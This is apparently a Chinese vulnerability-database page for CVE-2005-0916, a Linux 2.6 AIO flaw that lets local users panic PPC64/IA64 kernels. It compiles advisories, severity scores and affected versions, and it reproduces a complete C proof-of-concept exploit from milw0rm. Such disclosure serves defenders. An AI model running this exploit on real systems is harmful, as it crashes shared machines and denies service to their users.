CVE-2005-0916
CVSS2.1
发布时间 :2005-05-02 00:00:00
修订时间 :2008-09-05 16:47:40
NMCOES    

[原文]AIO in the Linux kernel 2.6.11 on the PPC64 or IA64 architectures with CONFIG_HUGETLB_PAGE enabled allows local users to cause a denial of service (system panic) via a process that executes the io_queue_init function but exits without running io_queue_release, which causes exit_aio and is_hugepage_only_range to fail.


[CNNVD]Linux Kernel本地拒绝服务漏洞(CNNVD-200505-150)

        Linux Kernel中存在本地拒绝服务漏洞。漏洞的起因是应用程序无法正确的管理输入/输出资源。本地攻击者可能利用这个漏洞导致受影响的Linux Kernel占用大量CPU时间,造成对合法用户的拒绝服务。
        

- CVSS (基础分值)

CVSS分值: 2.1 [轻微(LOW)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0916
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0916
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-150
(官方数据源) CNNVD

- 其它链接及资源

http://linux.bkbits.net:8080/linux-2.6/cset%404248c8c0es30_4YVdwa6vteKi7h_nw
(UNKNOWN)  CONFIRM  http://linux.bkbits.net:8080/linux-2.6/cset%404248c8c0es30_4YVdwa6vteKi7h_nw
http://groups-beta.google.com/group/linux.kernel/browse_thread/thread/13b43bd5783842f6/7ce3c5a514a497ab?q=io_queue_init&rnum=3#7ce3c5a514a497ab
(UNKNOWN)  MISC  http://groups-beta.google.com/group/linux.kernel/browse_thread/thread/13b43bd5783842f6/7ce3c5a514a497ab?q=io_queue_init&rnum=3#7ce3c5a514a497ab
http://www.securityfocus.com/bid/12987
(UNKNOWN)  BID  12987
http://www.novell.com/linux/security/advisories/2005_50_kernel.html
(UNKNOWN)  SUSE  SUSE-SA:2005:050

- 漏洞信息

Linux Kernel本地拒绝服务漏洞
低危 其他
2005-05-02 00:00:00 2005-10-20 00:00:00
本地  
        Linux Kernel中存在本地拒绝服务漏洞。漏洞的起因是应用程序无法正确的管理输入/输出资源。本地攻击者可能利用这个漏洞导致受影响的Linux Kernel占用大量CPU时间,造成对合法用户的拒绝服务。
        

- 公告与补丁

        目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接:
        http://www.kernel.org/

- 漏洞信息 (911)

Linux Kernel PPC64/IA64 (AIO) Local Denial of Service Exploit (EDBID:911)
linux dos
2005-04-04 Verified
0 Daniel McNeil
N/A [点击下载]
//
// Proof of Concept by Daniel McNeil
// compile using cc -o aiodio_read aiodio_read.c -laio
//

#define _XOPEN_SOURCE 600 
#define _GNU_SOURCE 


#include <unistd.h> 
#include <stdlib.h> 
#include <stdio.h> 
#include <string.h> 
#include <errno.h> 
#include <sys/fcntl.h> 
#include <sys/mman.h> 
#include <sys/wait.h> 
#include <sys/stat.h> 


#include <libaio.h> 


int pagesize; 
char *iobuf; 
io_context_t myctx; 
int aio_maxio = 4; 


/* 
* do a AIO DIO write 
*/ 
int do_aio_direct_read(int fd, char *iobuf, int offset, int size) 
{ 
struct iocb myiocb; 
struct iocb *iocbp = &myiocb; 
int ret; 
struct io_event e; 
struct stat s; 


io_prep_pread(&myiocb, fd, iobuf, size, offset); 
if ((ret = io_submit(myctx, 1, &iocbp)) != 1) { 
perror("io_submit"); 
return ret; 
} 


ret = io_getevents(myctx, 1, 1, &e, 0); 


if (ret) { 
struct iocb *iocb = e.obj; 
int iosize = iocb->u.c.nbytes; 
char *buf = iocb->u.c.buf; 
long long loffset = iocb->u.c.offset; 


printf("AIO read of %d at offset %lld returned %d\n", 
iosize, loffset, e.res); 
} 


return ret; 



} 


int main(int argc, char *argv[]) 
{ 
char *filename; 
int fd; 
int err; 

filename = "test.aio.file"; 
fd = open(filename, O_RDWR|O_DIRECT|O_CREAT|O_TRUN­C, 0666); 


pagesize = getpagesize(); 
err = posix_memalign((void**) &iobuf, pagesize, pagesize); 
if (err) { 
fprintf(stderr, "Error allocating %d aligned bytes.\n", 
pagesize); 
exit(1); 
} 
err = write(fd, iobuf, pagesize); 
if (err != pagesize) { 
fprintf(stderr, "Error ret = %d writing %d bytes.\n", 
err, pagesize); 
perror(""); 
exit(1); 
} 
memset(&myctx, 0, sizeof(myctx)); 
io_queue_init(aio_maxio, &myctx); 
err = do_aio_direct_read(fd, iobuf, 0, pagesize); 
close(fd); 


printf("This will panic on ppc64\n"); 
return err; 

}

// milw0rm.com [2005-04-04]
		

- 漏洞信息

15256
Linux Kernel is_hugepage_only_range() Function DoS
Local Access Required, Remote / Network Access Denial of Service
Loss of Availability
Exploit Public

- 漏洞描述

Linux Kernel on PPC64 or IA64 architectures contains a flaw that may allow a local or remote denial of service. The issue is triggered when a program using the is_hugepage_only_range() function calls the io_queue_init() function then exits without calling the io_queue_release() function first. This may cause a kernel panic and will result in loss of availability of the system.

- 时间线

2005-03-28 Unknow
2005-04-04 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

- 漏洞信息

Linux Kernel Asynchronous Input/Output Local Denial Of Service Vulnerability
Failure to Handle Exceptional Conditions 12987
No Yes
2005-04-04 12:00:00 2006-09-05 10:48:00
Daniel McNeil is credited with the discovery of this issue.

- 受影响的程序版本

S.u.S.E. Novell Linux Desktop 9.0
S.u.S.E. Linux Professional 9.3 x86_64
S.u.S.E. Linux Professional 9.3
S.u.S.E. Linux Professional 9.2 x86_64
S.u.S.E. Linux Professional 9.2
S.u.S.E. Linux Professional 9.1 x86_64
S.u.S.E. Linux Professional 9.1
S.u.S.E. Linux Personal 9.3 x86_64
S.u.S.E. Linux Personal 9.3
S.u.S.E. Linux Personal 9.2 x86_64
S.u.S.E. Linux Personal 9.2
S.u.S.E. Linux Personal 9.1 x86_64
S.u.S.E. Linux Personal 9.1
S.u.S.E. Linux Enterprise Server 9
Linux kernel 2.6.11 .6
Linux kernel 2.6.11 .5
Linux kernel 2.6.11 -rc4
Linux kernel 2.6.11 -rc3
Linux kernel 2.6.11 -rc2
Linux kernel 2.6.11
+ Red Hat Fedora Core4
Linux kernel 2.6.10 rc2
Linux kernel 2.6.10
+ Red Hat Fedora Core3
+ Red Hat Fedora Core2
+ Trustix Secure Linux 3.0
+ Ubuntu Ubuntu Linux 5.0 4 powerpc
+ Ubuntu Ubuntu Linux 5.0 4 i386
+ Ubuntu Ubuntu Linux 5.0 4 amd64
Linux kernel 2.6.9
Linux kernel 2.6.8 rc3
Linux kernel 2.6.8 rc2
Linux kernel 2.6.8 rc1
+ Ubuntu Ubuntu Linux 4.1 ppc
+ Ubuntu Ubuntu Linux 4.1 ia64
+ Ubuntu Ubuntu Linux 4.1 ia32
Linux kernel 2.6.8
+ S.u.S.E. Linux Personal 9.2 x86_64
+ S.u.S.E. Linux Personal 9.2
+ Ubuntu Ubuntu Linux 4.1 ppc
+ Ubuntu Ubuntu Linux 4.1 ia64
+ Ubuntu Ubuntu Linux 4.1 ia32
Linux kernel 2.6.7 rc1
Linux kernel 2.6.7
Linux kernel 2.6.6 rc1
Linux kernel 2.6.6
Linux kernel 2.6.5
+ S.u.S.E. Linux Enterprise Server 9
+ S.u.S.E. Linux Personal 9.1 x86_64
+ S.u.S.E. Linux Personal 9.1 x86_64
+ S.u.S.E. Linux Personal 9.1
+ S.u.S.E. Linux Personal 9.1
Linux kernel 2.6.4
Linux kernel 2.6.3
Linux kernel 2.6.2
Linux kernel 2.6.1 -rc2
Linux kernel 2.6.1 -rc1
Linux kernel 2.6.1
Linux kernel 2.6

- 漏洞讨论

A local denial-of-service vulnerability affects the Linux kernel because it fails to properly manage input/output resources.

A local attacker may leverage this issue to cause an affected Linux kernel to panic, effectively denying service to legitimate users.

- 漏洞利用

The following exploit has been made available:

- 解决方案

SUSU has released advisory SUSE-SA:2005:050, along with fixes to address various issues in the Linux kernel. Please see the referenced advisory for more information.

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: vuldb@securityfocus.commailto:vuldb@securityfocus.com.


Linux kernel 2.6.11

Linux kernel 2.6.4

Linux kernel 2.6.8

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站